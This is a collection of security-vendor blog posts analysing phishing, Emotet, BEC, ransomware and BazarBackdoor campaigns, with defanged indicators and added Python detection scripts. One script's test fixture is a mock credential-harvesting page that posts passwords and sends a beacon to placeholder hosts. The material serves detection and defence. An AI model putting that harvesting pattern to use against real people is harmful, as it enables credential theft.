Document Sharing Services Represent a Vector for Phishing Campaigns

By Zachary Bailey, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has seen the rise of threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted.

Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to include a purchase order with encryption via the Adobe Document Cloud. In the email, Adobe is just one of several components of the phish. It builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file – or download Acrobat Reader to view it instead.

Figure 1: Email Body 

This email appears to be a forwarded message, as though the recipient is expecting it – FW: Purchase Order 3500250780 as the subject, which also includes the name of the organization sending the PO. A common tactic used by threat actors is to create a fake reply chain by inserting “RE” or “FW” into the subject line to trick the recipient into thinking it is a response to a conversation they initiated or were involved in.  

Even though the address is clearly from a Gmail domain, it is not an uncommon practice for work-related emails to be shared between personal and corporate accounts.  

The email is rather informative, listing the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not urged to sign in but are presented with an alternative option that would not put their credentials at risk. The only urgency is “with immediate effect please ensure all invoices are addressed as below”, but that is legitimate information regarding how to address the invoice.

If the recipient chooses to sign into the Adobe Document Cloud, they will immediately open the document which then launches in their default web browser. This HTML file will pull its resources from Adobe’s website while the pop-up message in Figure 2 delays the victim from seeing the page. JavaScript is embedded in the page to enforce basic password guidelines, which increases the odds that a realistic password is entered into the form. After the user attempts to log on, the HTML file will also send out a POST request with their login information to the threat actor.

Figure 2: Step 1 of Attack 

When the document is opened by the recipient, its contents are not immediately visible. A popup message covers the assets as they load, and the user reads it before proceeding. This is not hosted on a website, so checking the URL will not immediately tip off users that something is amiss. To them, they are just viewing a file on their computer. The wording of the popup is “This document is electronically encrypted to the receiver’s email”, which is a strange way of saying that the document can only be unlocked by the recipient. If a user is not familiar with technical terms, it could still sound legitimate to them, but that should be the first hint something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more noticeable tip-off that this form wants their login information.

Figure 3: Step 2 of Attack 

After the user clicks through to access the login page, a full webpage appears that looks like the Adobe Document Cloud site. This is still occurring inside of the downloaded document, and the only way to analyze where the form is from – without pressing “sign in” – is to inspect the code itself. To verify where the login information is going, we pulled up the network traffic and sent a request through. Our information is now going to “infiniteworks[.]net/IDI/high.php”, which is not a part of Adobe.  
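As an added example (not code from the original post or from Cofense), here is the static check an analyst can run on an HTML attachment of this kind instead of submitting a request through it: record which hosts the file loads its look-and-feel from and which hosts receive form submissions or script-initiated requests, then flag a password form whose submission target lies outside the impersonated brand. The sample attachment and every hostname in it are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the attachment described above: assets come from the
# impersonated brand, the login form posts elsewhere. Hostnames are placeholders.
SAMPLE_ATTACHMENT = """\
<html><head>
<link rel="stylesheet" href="https://documentcloud.adobe.com/assets/style.css">
<script src="https://documentcloud.adobe.com/assets/app.js"></script>
</head><body>
<div id="popup">This document is electronically encrypted to the receiver's email.</div>
<form id="login" method="post" action="https://collector-placeholder.example/IDI/high.php">
  <input name="email" type="email" value="recipient@victim-placeholder.example">
  <input name="password" type="password" minlength="8">
  <button type="submit">Sign in</button>
</form>
<script>
  // Client-side "password policy" so that whatever is captured looks real.
  document.getElementById("login").onsubmit = function () {
    var p = document.querySelector("[name=password]").value;
    return p.length >= 8 && /[0-9]/.test(p);
  };
  fetch("https://telemetry-placeholder.example/beacon", {method: "POST"});
</script>
</body></html>
"""

# URLs passed to fetch(...) or XMLHttpRequest.open(method, ...) inside inline scripts.
JS_URL_RE = re.compile(
    r"""(?:fetch\s*\(|\.open\s*\(\s*['"][A-Za-z]+['"]\s*,)\s*['"](https?://[^'"]+)['"]"""
)


class AttachmentScanner(HTMLParser):
    """Collects where the page loads from and where it sends data to."""

    def __init__(self):
        super().__init__()
        self.resource_hosts = set()  # look-and-feel sources (css, js, images)
        self.send_targets = []       # form actions and script-initiated requests
        self.has_password_field = False
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src") or a.get("href")
        if tag in ("link", "script", "img") and src:
            host = urlparse(src).hostname
            if host:
                self.resource_hosts.add(host.lower())
        if tag == "form" and a.get("action"):
            self.send_targets.append(a["action"])
        if tag == "input" and a.get("type", "").lower() == "password":
            self.has_password_field = True
        if tag == "script" and not src:
            self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.send_targets.extend(JS_URL_RE.findall(data))


def triage_html_attachment(html_text, brand_domains):
    """Flag a login form whose submitted data leaves the brand the page imitates."""
    scanner = AttachmentScanner()
    scanner.feed(html_text)
    scanner.close()

    def is_brand(host):
        return any(host == d or host.endswith("." + d) for d in brand_domains)

    off_brand = []
    for url in scanner.send_targets:
        host = (urlparse(url).hostname or "").lower()
        if not is_brand(host):
            off_brand.append((host, url))
    harvesting = scanner.has_password_field and bool(off_brand)
    return {
        "loads_brand_assets": any(is_brand(h) for h in scanner.resource_hosts),
        "has_password_field": scanner.has_password_field,
        "off_brand_send_targets": off_brand,
        "verdict": "credential-harvesting" if harvesting else "needs-review",
    }


if __name__ == "__main__":
    print(triage_html_attachment(SAMPLE_ATTACHMENT, ["adobe.com"]))
```

The check is deliberately static: nothing in the attachment is rendered or executed, so no request reaches the collecting host during analysis.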

Figure 4: Final Redirect of Phish  

After exposing their Adobe account credentials to the attacker, the victim is redirected to a new webpage. If they check the URL again, they will discover that they are now on the actual Adobe website. With no new document being decrypted, they should be fully aware that something is wrong. They should alert their security team immediately.

Indicators of Compromise 

Network IOC   IP   
hXXps://infiniteworks[.]net/IDI/high.php  70[.]40[.]220[.]123 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Variants of Emotet Malware

By Ala Dabat and Adam Martin 

The Cofense Phishing Defense Center (PDC) team has seen a resurgence in the number of Emotet variants in the past few months, with the majority of payloads being delivered via highly obfuscated macros embedded within Microsoft Word documents.

We will be taking a look at an example of Emotet that has managed to bypass Office365 SEGs using simple email layouts with a limited number of red flags usually picked up by traditional spam filtering.  

Figure 1 

A common pattern observed is payload deliveries bypassing traditional security scanning by both compressing and password-protecting the folder containing the malicious file. This makes it impossible for security scan engines to examine the folder's contents.

Figure 2

Once the password-protected file is decompressed, the malicious Emotet payload is presented, ready for the target to open.
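An added example (not Cofense tooling) of the gateway-side check this tactic calls for: a ZIP attachment whose entries carry the "encrypted" flag cannot be content-scanned, so the decision has to be made on the archive's own metadata. The archive builder below constructs a minimal single-entry ZIP in memory and only raises the encryption flag bit (the bytes are not really encrypted), which is exactly what a scanner without the password sees; the filename and payload bytes are constructed.

```python
import io
import struct
import zipfile
import zlib

MACRO_CAPABLE = (".doc", ".docm", ".xls", ".xlsm", ".ppt", ".pptm")


def build_zip(name, data, encrypted):
    """Constructed single-entry STORED archive. When `encrypted` is set, only the
    general-purpose flag bit 0 (the 'entry is encrypted' bit) is raised; the
    data itself is left as-is, which is enough to exercise the metadata check."""
    flags = 0x0001 if encrypted else 0x0000
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # Local file header (30 bytes + name), then the stored data.
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, 0, 0, 0,
                        crc, len(data), len(data), len(name), 0) + name
    # Central directory entry (46 bytes + name) pointing at offset 0.
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0, 0, 0,
                          crc, len(data), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    # End of central directory record (22 bytes).
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1,
                       len(central), len(local) + len(data), 0)
    return local + data + central + eocd


def scan_zip_attachment(blob):
    """Triage a ZIP attachment without its password: list entries, mark those whose
    content is unreadable (encrypted), and those that could carry macros."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        infos = zf.infolist()
        names = [zi.filename for zi in infos]
        encrypted = [zi.filename for zi in infos if zi.flag_bits & 0x1]
        macro_capable = [n for n in names if n.lower().endswith(MACRO_CAPABLE)]
    if encrypted:
        action = "quarantine-for-manual-review"  # content cannot be scanned
    elif macro_capable:
        action = "detonate-in-sandbox"
    else:
        action = "scan-contents"
    return {"entries": names, "encrypted": encrypted,
            "macro_capable": macro_capable, "action": action}


if __name__ == "__main__":
    payload = b"constructed payload bytes"
    print(scan_zip_attachment(build_zip(b"Invoice_2020.doc", payload, True)))
    print(scan_zip_attachment(build_zip(b"Invoice_2020.doc", payload, False)))
```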

Figure 3 

Figure 4 

A call-to-action command is then executed (usually using PowerShell) via heavily obfuscated macros.

Figure 5 

The call to action then downloads up to several variants of both Emotet and other malware families from a number of different command-and-control operations, which is in stark contrast to earlier generations of Emotet malware. Emotet appears to have the capability of exploiting known Windows system vulnerabilities, as well as having the ability to scan Windows directories in order to harvest sensitive data.

Figure 6 

Following on from the contacted URLs displayed in the above figure, some testing was carried out on the downloaded payloads. The URL found in Figure 7 was used as a hosting service for the Emotet sample. This is illustrated by the executable downloaded to the host machine.

Figure 7 

Once executed, this malicious binary will delete itself from the original folder it was downloaded to and will terminate its running processes. Then it will create a carbon copy of itself in “/AppData/Local/XBAuthManagerProxy” under the name “security.exe”. A comparison of the SHA256 of the original and the newly created file confirms they are identical.

Figure 8 

Dynamic analysis of the dropped executable reveals a host of interesting functions being created and called. Native Windows DLLs associated with networking are utilized for connectivity, as seen in Figures 9 and 10.

Figure 9 

Figure 10 

Figure 11

A network traffic analysis confirms that information was posted to the aforementioned C2 address.

Figure 12 

Indicators of Compromise 



Business Email Compromise (BEC) Scam Advances Alert About Fraud

By Kian Mahdavi and Geraint Williams, Cofense Phishing Defense Center 

The Cofense Phishing Defense Center (PDC) is seeing continued growth in business email compromises (BECs). This is fueled by government grants that have recently been set in place and, as a result, enable SMBs to access finance faster than usual, particularly during the coronavirus pandemic.

Quite often such attacks tend to target senior executives within organizations, typically due to the authority they have in getting employees to quickly respond to the request. This is completed by using a combination of social engineering tactics, such as urgency to forward confidential data and fear of work suspension (should the employee not do as instructed).

Figure 1  Body of email showcasing interaction  

The email body within Figure 1 reads: “Please get this information”, followed by the display name of an executive at a global financial firm, with the spoofed email. This itself may raise red flags to eagle-eyed recipients, as the company’s trademarked name is not included in any part of the full email address. Solid social engineering tactics have been utilized, with the attacker providing support to assist with the success of this attack – “can be found on any documents from HMRC …”

The attacker has spoofed a law firm located in North Carolina. Since the TLD is from a legitimate source, not only does it pass basic email security checks, such as SPF, but more importantly it evades existing security measures provided by Microsoft 365 EOP and Proofpoint.

Furthermore, the opening of the email directly addresses the recipient by first name, as opposed to a generic opening such as, “Good Morning” or “Dear…”, indicating that this is a spear-phishing email that has been hand selected to target one individual.  

Figure 2 – Email header analysis 

If we dive further into the headers, as shown above in Figure 2, the “reply to” address is actually {redacted}@chckl[.]co[.]uk. chckl – a purchased top-level domain – is used in an attempt to draw full attention to the innocent law firm. This further provides evidence that the law firm may have had its email servers compromised. In this way, the attacker is hiding their actual location.

Typically, such emails target employees within financial departments, simply because of the data they can access. This particular attack does exactly that by harvesting the necessary sensitive information to be used for financial crime.

One can understand how easy it is to fall for such attacks, particularly for individuals who would expect to receive such emails. Attackers are using this to their advantage.  

Indicators of compromise   

Network IOC   IP 
{redacted}@chckl[.]co[.]uk 

{redacted}@{redacted }[.]com 

31[.]54[.]174[.]55 

At the User’s Expense: Threat Actors Weaponize Companies’ Employee Reimbursements During the Pandemic

By Harsh Patel, Cofense Phishing Defense Center 

With the health crisis that is COVID-19, employees are dutifully working from home. While some already had home offices decked out with dual monitors, printers and the like to complete their jobs, others did not. Because of this, many companies took to offering their employees a chance to buy the tools needed for their newly designated remote positions through added reimbursements.

The Cofense Phishing Defense Center (PDC) has identified a campaign that attempts to steal employee credentials by leveraging reimbursement emails. This campaign was seen across multiple employee groups in the insurance, medical, professional services and banking industries.

Figures 1 and 2: Email Body 

The first thing the recipient will notice is that the display name field shows their company’s name. This makes it appear as if the email originated from within the company, putting the recipient at ease about its legitimacy. However, the real sender can be seen right next to it. In this case, it was sent from a compromised account. The “Expense Reimbursement” subject also suggests a conversation that would happen between a user and finance, further helping the credibility.

The email body continues to explain the reason for this email, and mentions an attached file with expense reimbursement certification, list of qualified employees and attached reimbursement policy. Although there is no attached file, the email contains a button “CLICK HERE TO REVIEW” with a hyperlink to take the recipient to the phishing landing page.

Figure 3: Phishing Page 

Upon clicking the button found in the email, users are redirected to the page shown in Figure 3. At a glance, it appears to be a login page for Adobe, offering the user options to view, download or send. Note that the email of the recipient is already filled out; the only field left empty is for the password. Despite all these attempts to appear legitimate, this is not the real Adobe login page. The URL in the address bar is not Adobe.com, and this isn’t the typical Adobe login users would normally see or receive.

However, should users continue to enter login details, they are redirected to their company’s site as if nothing happened. And that is exactly what threat actors want. These pointless redirects to legitimate documents or company sites have become increasingly common as a way to distract users from the series of spoofed pages and/or actions they have just taken.  
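The three header-level tells described across these posts (the “FW:”/“RE:” subject with no conversation behind it, the Reply-To steering replies away from the visible sender in the BEC case, and the display name carrying the recipient's own company name while the mailbox sits elsewhere) can be checked mechanically before the body is even read. The following is an added example, not Cofense code; the four messages are constructed and every address uses a placeholder domain.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed messages with placeholder addresses (not real samples).
PO_PHISH = """\
From: Accounts Payable <accounts.payable.ref@gmail-placeholder.example>
To: buyer@acme-placeholder.example
Subject: FW: Purchase Order 3500250780
Message-ID: <1@gmail-placeholder.example>

Please find the encrypted purchase order attached.
"""

BEC_PHISH = """\
From: Jane Executive <jane.executive@lawfirm-placeholder.example>
Reply-To: jane.executive@replies-placeholder.example
To: finance@acme-placeholder.example
Subject: Please get this information
Message-ID: <2@lawfirm-placeholder.example>

Please get this information ...
"""

REIMBURSEMENT_PHISH = """\
From: Acme <helpdesk@compromised-placeholder.example>
To: staff@acme-placeholder.example
Subject: Expense Reimbursement
Message-ID: <3@compromised-placeholder.example>

CLICK HERE TO REVIEW
"""

GENUINE_REPLY = """\
From: Bob Colleague <bob@acme-placeholder.example>
To: staff@acme-placeholder.example
Subject: RE: Expense Reimbursement
In-Reply-To: <3@acme-placeholder.example>
References: <3@acme-placeholder.example>
Message-ID: <4@acme-placeholder.example>

Thanks, done.
"""

REPLY_PREFIX = re.compile(r"^\s*(re|fw|fwd)\s*:", re.I)


def domain_of(addr_header):
    """Bare domain of an address header such as 'Name <user@host>'."""
    return parseaddr(addr_header or "")[1].rpartition("@")[2].lower()


def check_headers(raw_message, own_domain, company_name):
    """Return the list of tells found; an empty list means none of the three fired."""
    msg = message_from_string(raw_message)
    findings = []
    subject = msg.get("Subject", "")
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()

    # 1. "RE:"/"FW:" subject with no threading headers: nothing was replied to.
    if REPLY_PREFIX.match(subject) and not (msg.get("In-Reply-To") or msg.get("References")):
        findings.append("fake-reply-chain")

    # 2. Display name carries the recipient's company name, but the mailbox is elsewhere.
    if company_name.lower() in from_name.lower() and from_domain != own_domain.lower():
        findings.append("display-name-impersonates-company")

    # 3. Reply-To steers responses to a domain other than the visible sender's.
    reply_domain = domain_of(msg.get("Reply-To"))
    if reply_domain and reply_domain != from_domain:
        findings.append("reply-to-domain-mismatch")
    return findings


if __name__ == "__main__":
    for label, raw in [("PO", PO_PHISH), ("BEC", BEC_PHISH),
                       ("Reimbursement", REIMBURSEMENT_PHISH), ("Genuine", GENUINE_REPLY)]:
        print(label, check_headers(raw, "acme-placeholder.example", "Acme"))
```

A genuine forward from a colleague also lacks In-Reply-To, so the first check is a prompt for closer review rather than a verdict on its own.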

Network Indicators of Compromise  IP   
hXXps://u8824451[.]ct[.]sendgrid[.]net/ls/click?upn=5fYtplO-2FP4S37YYMUNVFFIYhCASYIhBbksOQ-2FihRkfMagXRLczMdDWyGKLdaZ2fGhDy-2F2d9wvh3PmFD5Sd8Ylj1giWERtRpL-2BYsNOHEY5W-2BBEnizS435nr7Iu6j9LQ83iSwjaVHWuQCdmZsBXdcJvA-3D-3Dso-6_92JbB3bEppNSos0IRm49Wrp0NXARSmPYQFezDWMyIFHQkj2X-2FV88He6bzn3ZQbN4zh3Px7vCRVXXJQVUHQKFM6tWC6htmDfIm2iAnxbxF4QYUCwxdxpxyJXzJnEiiVU-2B4RBPNQjJGDMSdA8h3kr8CxAU7MmcKmgZO-2F1dJRFBqLVw6c45Gn27jKYlDGmJUCIAsGGZAJhw-2B0-2Frp-2B9eu1VCNrNiXpM353O-2Fk1OfygI64nk-3D  167[.]89[.]123[.]16 
hXXps://669cee6d14[.]nxcli[.]net/nike/new/dobe/sssx/adobe-RD28/index[.]html  209[.]126[.]25[.]245 

Coronavirus Test Results Return Data-Exfiltrating Ransomware

By Dylan Duncan

Cofense Intelligence has discovered a COVID-19-themed phishing campaign that delivers a new version of the Hentai OniChan ransomware. The new variant, known as King Engine, exfiltrates data and charges a significantly higher ransom than previously analyzed versions of Hentai OniChan. Previous campaigns delivering the Berserker variant of this ransomware used similar phishing emails to target the financial and energy sectors and did not exfiltrate data. Ransomware campaigns that exfiltrate data are becoming more of a common trend, as they add to the pressure of paying the ransom and reduce the efficacy of file backups.

The phishing email shown in Figure 1 was found in environments protected by secure email gateways (SEGs) and currently targets the healthcare industry using response subjects allegedly returning patients’ COVID-19 test results. The spike in coronavirus cases during October has led to more testing and makes this type of phishing campaign even more threatening. This campaign uses common tactics, techniques, and procedures (TTPs) to reach end users and deliver Hentai OniChan ransomware, which belongs to the Quimera ransomware family. Though, of course, the addition of data exfiltration, almost certainly to support data leaks should a targeted victim refuse to pay the ransom, is new. This addition highlights a new trend seen in ransomware that is similar to the Avaddon ransomware campaign that was first seen in June and was delivered by the Trik botnet.

Figure 1  Phishing Email Delivering Hentai OniChan Ransomware. 

Hentai OniChan Ransomware 

Campaigns observed by Cofense that deliver the Hentai OniChan ransomware date back to September and have been found in environments protected by Proofpoint, Symantec, TrendMicro, Microsoft ATP and Cisco IronPort. These campaigns use a common tactic to reach end users by delivering embedded URLs to download an HTML or PDF file. The downloaded files contain components to drop and run the ransomware executable encrypting victims and holding them hostage, promising to provide a decryption application upon receipt of the ransom payment. Once the target’s files are encrypted, a ransom note is provided and a background image, shown in Figure 2, is set explaining the means by which the encrypted user may pay the ransom and regain access to the encrypted data. The ransom note explains to victims affected how to pay the ransom and includes a price, Bitcoin address, timeline and contact email address.

Figure 2  Hentai OniChan Ransom Note

Berserker v. King Engine 

More ransomware operations have added to the chaos by using data exfiltration. This campaign shows Hentai OniChan has joined the trend. The early stages of the Hentai OniChan ransomware that used the Berserker version did not exfiltrate data, and encrypted files with the .HOR extension. The new strain, King Engine, as of now has only been seen targeting the healthcare industry and exfiltrates data to an email address found within the ransomware executable. This version encrypts files with a .docm extension and charges a significantly higher ransom of 50 Bitcoin (BTC) (~$650,000 USD), whereas the previous version only charged 10 BTC (~$130,000 USD). Based on our analysis, other ransomware threat actors who have followed the data exfiltration trend often set up data leak websites to publish stolen data if the ransom is not paid. As of now, data leak websites have not been seen from Hentai OniChan operators.

Indicators of Compromise 

Active Threat Report  Date Published 
80619  2020-10-28 
56658  2020-09-14 

Phish Found in Proofpoint-Protected Environments – Week ending November 6, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: Agent Tesla Keylogger 

DESCRIPTION:  Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable. 

TYPE: Remote Access Trojan 

DESCRIPTION: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded OneDrive URLs. 

TYPE: Agent Tesla Keylogger 

DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs. Note: These emails are in Spanish.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Phish Found in Proofpoint-Protected Environments – Week ending October 30, 2020

100% of the phish seen by the Cofense Phishing Defense Center® (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes. 

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the Cofense PDC in environments protected by Proofpoint. 

TYPE: LokiBot

DESCRIPTION: Shipping-spoofing emails found in environments protected by Proofpoint deliver LokiBot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run LokiBot.

TYPE: QakBot

DESCRIPTION: Response-themed email found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

TYPE: Remote Access Trojan

DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


The Ryuk Threat: Why BazarBackdoor Matters Most

By The Cofense Intelligence Team

Ryuk Ransomware: From TrickBot to BazarBackdoor – What You Need to Know.


Yesterday, the Cofense Intelligence team released the following guidance via a flash alert to Cofense Intelligence customers.

On October 28, media reports and U.S. government notifications emerged regarding an active “credible” Ryuk ransomware threat targeting the U.S. healthcare and public health sector, with plans of a coordinated attack October 29. This was reportedly based on chatter observed in an online forum that allegedly included members of the group behind Ryuk. Cofense Intelligence is conducting an ongoing investigation into this threat. While we can’t evaluate the government’s determination of this threat as credible, we are taking this very seriously and have observed increased activity against the healthcare sector. We assess with high confidence that BazarBackdoor is the primary delivery mechanism currently used for Ryuk operations. Moreover, we’ve identified that similar phishing campaigns used to establish a foothold for Ryuk infections have targeted other sectors, as well.

BazarBackdoor: Ryuk’s Inroad

Cofense Intelligence assesses that Ryuk operators typically wait until their preferred delivery mechanism is successfully deployed to an intended target prior to deploying Ryuk ransomware itself. Up until TrickBot’s disruption, Ryuk was most frequently delivered via TrickBot. However, our analysis indicates that the group behind Ryuk began leveraging BazarBackdoor to establish access to target systems in September. This aligns closely with announcements that U.S. Cyber Command had taken action to disrupt TrickBot operations. In recent weeks, we assess with high confidence that BazarBackdoor has been Ryuk’s most predominant loader. With lower confidence, we assess this wave of Ryuk activity may be, in part, in retaliation for September’s TrickBot disruptions.

BazarBackdoor is a stealthy malware downloader that we assess is used by the same group as TrickBot. Typically, emails designed to appear as internal business communications are sent to victims within an organization, often with relevant employee names or positions. These emails usually contain a link, most often to a Google Docs page, though other well-known file hosting platforms have also been used. The Google Docs page will then present a convincing image with another embedded link. This link is typically to a malicious executable hosted on a trusted platform such as Amazon AWS. This chain of legitimate services makes it difficult to detect and stop these campaigns.

Once in place on a victim’s computer, BazarBackdoor uses specialized network communications to avoid detection and to contact its command and control (C2) locations. Part of these communications involve DNS lookups for .bazar domains, which is the reason behind its Bazar name. These C2 locations also often serve as payload locations. After BazarBackdoor contacts its C2 center it will then collect additional information which the threat actors can use to deliver customized reconnaissance tools, such as Cobalt Strike payloads. The threat actors can also choose to deliver other payloads such as Ryuk ransomware. The deployment of Ryuk ransomware isn’t automated, and therefore won’t occur unless the threat actors decide the infected environment is a target.
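The .bazar lookups mentioned above are a usable detection signal on their own: .bazar is a blockchain-based name space (EmerDNS) that the public DNS root does not delegate, so a workstation asking the corporate resolver for any .bazar name is worth an alert even though the resolver will only answer NXDOMAIN. The following is an added example (not Cofense tooling) that runs that check over a constructed BIND-style query log; the .bazar names in it are placeholders, and the script matches the final label exactly so that a registered domain merely containing "bazar" is not a hit.

```python
import re
from collections import defaultdict

# Constructed BIND-style query log. The .bazar names are placeholders; the
# other lines show ordinary lookups, including a registered domain whose
# label merely contains the string "bazar".
SAMPLE_QUERY_LOG = """\
28-Oct-2020 09:12:01.104 client 10.20.30.40#51234: query: c2-placeholder.bazar IN A + (10.0.0.53)
28-Oct-2020 09:12:01.220 client 10.20.30.40#51235: query: docs.google.com IN A + (10.0.0.53)
28-Oct-2020 09:12:03.011 client 10.20.30.41#40001: query: bazar-shop.example.com IN A + (10.0.0.53)
28-Oct-2020 09:12:05.777 client 10.20.30.40#51236: query: loader-placeholder.bazar IN A + (10.0.0.53)
28-Oct-2020 09:12:06.001 client 10.20.30.42#42000: query: s3.amazonaws.com IN A + (10.0.0.53)
28-Oct-2020 09:12:07.300 client 10.20.30.43#42001: query: portal.bazar. IN AAAA + (10.0.0.53)
"""

QUERY_RE = re.compile(
    r"client (?P<src>\d{1,3}(?:\.\d{1,3}){3})#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)

# Top-level labels that the public DNS root does not delegate. A resolver
# answers NXDOMAIN, but the attempt itself is the signal.
SUSPECT_TLDS = {"bazar"}


def find_suspect_tld_queries(log_text, suspect_tlds=SUSPECT_TLDS):
    """Map source IP -> queried names whose final label is in suspect_tlds.
    The final label is compared exactly, so 'bazar-shop.example.com' is not a hit."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if qname.rpartition(".")[2] in suspect_tlds:
            hits[m.group("src")].append(qname)
    return dict(hits)


if __name__ == "__main__":
    for src, names in find_suspect_tld_queries(SAMPLE_QUERY_LOG).items():
        print(f"{src} queried {len(names)} .bazar name(s): {', '.join(names)}")
```

Each source IP in the result is a host to isolate and examine for the loader, not just a name to block, since the lookup shows the implant is already running there.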

All of us should pay special heed to any indications of BazarBackdoor compromise. Regardless of whether recent activity is in retaliation against TrickBot’s disruption, what is clear is that recent efforts by multiple parties to cripple TrickBot seem to have been effective in transitioning the Ryuk actors to leveraging BazarBackdoor. We must be mindful that there are past connections between TrickBot activity and Emotet. While there is no direct evidence of current Emotet involvement in these campaigns, we cannot rule out future delivery of Ryuk via Emotet, given historical relationships between TrickBot and Emotet. As the TrickBot infrastructure appears to be in the process of restructuring, we assess that it may find use again as a delivery mechanism. As a network defender, all three malware families should be prioritized when searching for possible compromises, with the highest priority placed on detections of BazarBackdoor in the near future.

Figure 1: Common Phishing Example Delivering BazarBackdoor

The Phish

Cofense Intelligence has directly identified several campaigns, targeting multiple sectors across our customer base, that share strong similarities to the phishing emails reportedly used as initial attack vectors in Ryuk campaigns, as outlined by FireEye. Two subject themes stand out across several industry verticals we’ve confirmed were targets of BazarBackdoor. These subjects relate A) to employment termination, almost always including the word “termination,” or B) to payroll, almost always including the word “debit,” as shown in Figure 1. While the subjects remain the same, we observed two separate download services: via Google Docs or Constant Contact. The following list highlights the different industries we have confirmed were targeted by such campaigns. However, we cannot assess whether Ryuk operators intended to further infect these targets with Ryuk ransomware. It appears very likely that Ryuk operators have cast a wide net for potential infection vectors, and choose which successful footholds to manually interact with and leverage.

Figure 2: Termination List Phishing Example Delivering BazarBackdoor

It is worth noting that these campaigns began in mid-September, which corresponds with the timing of coordinated offensive operations to disrupt TrickBot. The sectors we have directly observed targeted in these campaigns include:

  • Consumer Goods
  • Healthcare
  • Mining
  • Energy
  • Insurance
  • Professional Services
  • Financial Services
  • Manufacturing
  • Retail

Assessing the Threat

As of early this morning, October 30, there are reports of some ransomware attacks against U.S. healthcare organizations yesterday. More reports may emerge in the coming days, though initial indications suggest a healthcare sector doomsday was avoided. In recent weeks there has been an abundance of ransomware activity against the healthcare sector, and we identified an increase in BazarBackdoor targeting. It is not for us to say whether the stated time or scope of the threat was off base, whether active countermeasures have succeeded, or whether the flurry of reporting has deterred some ransomware activity for now. It is possible the operators did not, or do not, want to face such a well-guarded and prepared target base. Still, we are confident that Ryuk operations have recently increased and that other sectors have come into the crosshairs of potential future Ryuk operations. Our assessment is that the threat should be taken seriously.

Cofense Intelligence customers have received relevant indicators of compromise (IOCs) and Active Threat Reports (ATRs) as these campaigns are identified and analyzed; some of these ATRs were first sent in September. Customers can find these ATRs and IOCs in ThreatHQ and via our API, and can access the most up-to-date list of all relevant Cofense Intelligence IOCs and ATRs tied to BazarBackdoor, TrickBot and Emotet via our API and on ThreatHQ.

For all readers, below is a table of relevant IOCs and Yara Rules associated with BazarBackdoor that can help your organization identify related emails should you be targeted. Gain free access to our intel here.

